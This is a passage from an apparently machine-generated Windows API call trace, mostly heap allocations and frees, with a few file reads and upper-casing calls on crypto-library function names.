(in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0122.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0122.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0122.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0122.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0122.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e02020 [0122.958] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0122.959] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x5ad5, lpOverlapped=0x0) returned 1 [0122.960] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0122.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0122.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0122.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0122.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5ad5) returned 0x49aa010 [0122.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e02020 | out: hHeap=0x1780000) returned 1 [0122.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0122.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0122.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0122.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0122.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5ad5) returned 0x49afaf0 [0122.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0122.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.965] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0122.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0122.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0122.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0122.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0122.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5ad5) returned 0x49aa010 [0122.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0122.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0122.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0122.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0122.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0122.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0122.965] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0122.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0122.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0122.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0122.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0122.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0122.965] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0122.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0122.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392420 [0122.966] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0122.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392420 | out: hHeap=0x1780000) returned 1 [0122.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0122.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2680 [0122.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0122.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0122.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0122.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0122.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5ad5) returned 0x49aa010 [0122.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0122.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26a0 [0122.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0122.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0122.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2530 [0122.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0122.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0122.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26c0 [0122.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0122.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0122.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4c0 [0122.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0122.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0122.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0122.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0122.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0122.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5ad5) returned 0x49b55d0 [0122.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0122.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0122.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0122.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0122.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0122.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0122.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0122.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0122.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0122.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0122.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0122.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0122.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0122.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0122.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0122.968] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0122.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0122.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0122.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0122.968] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0122.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0122.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0122.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0122.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0123.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0123.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0123.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0123.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0123.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0123.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0123.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0123.016] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0123.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0123.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0123.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0123.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25d0 [0123.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0123.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0123.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0123.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0123.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca880 [0123.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0123.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0123.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0123.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0123.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0123.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0123.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0123.017] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0123.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0123.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0123.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0123.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0123.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0123.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0123.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0123.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0123.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0123.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0123.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0123.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0123.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0123.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0123.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0123.018] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0123.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0123.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0123.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0123.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0123.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0123.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0123.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0123.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0123.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0123.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0123.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0123.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0123.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0123.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0123.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0123.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0123.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0123.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0123.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0123.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0123.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0123.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0123.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0123.019] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0123.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0123.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0123.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0123.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0123.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0123.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0123.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0123.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0123.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0123.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0123.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0123.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392570 [0123.019] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0123.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392570 | out: hHeap=0x1780000) returned 1 [0123.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0123.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa60 [0123.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0123.019] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0123.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0123.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0123.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0123.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0123.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0123.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0123.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0123.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0123.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0123.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0123.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0123.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0123.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0123.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0123.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0123.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0123.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0123.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0123.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0123.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0123.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0123.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0123.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0123.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0123.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0123.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0123.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0123.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0123.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0123.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0123.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0123.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0123.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0123.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0123.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0123.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0123.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0123.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0123.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0123.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0123.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0123.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0123.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0123.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0123.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0123.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0123.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0123.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0123.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0123.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0123.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0123.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f28 [0123.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2668 [0123.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0123.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0123.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0123.022] HeapFree 